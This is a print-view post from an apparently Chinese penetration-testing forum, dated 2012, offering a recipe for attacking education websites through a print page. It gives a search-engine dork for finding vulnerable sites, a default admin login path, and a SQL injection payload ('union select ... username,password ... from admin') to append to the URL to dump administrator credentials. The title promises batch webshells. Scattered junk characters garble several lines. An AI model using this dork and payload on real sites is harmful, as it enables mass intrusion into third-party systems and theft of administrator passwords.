中国网络渗透测试联盟

标题: 某教育站打印页面漏洞批量webshell [打印本页]
作者: admin    时间: 2012-10-31 08:37
标题: 某教育站打印页面漏洞批量webshell
教育站打印页面漏洞
9 U8 M/ I+ b2 ~1 r百度或google搜索 inurl:info_Print.asp?ArticleID=! Q5 }% u3 W5 w
默认后台:/ad_login.asp
+ l2 x  F, V/ I爆管理员密码:
. B. Y9 \+ y0 l) Y7 `) l* k! i% f在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
' @# w2 y- V0 M2 T! e
' L3 S3 A1 q) i# K! |9 H# vunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin/ i% d* \: |  Y0 K& w: x# D" I2 l  A* w0 u
& e! z% i/ r; p. [( b
作者:佚名 " Q, l2 T# u; v1 Q; E4 N: I# _
3 d% b. `# u4 F$ Z6 h: ?' C7 {
# q7 t* q# |) f




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2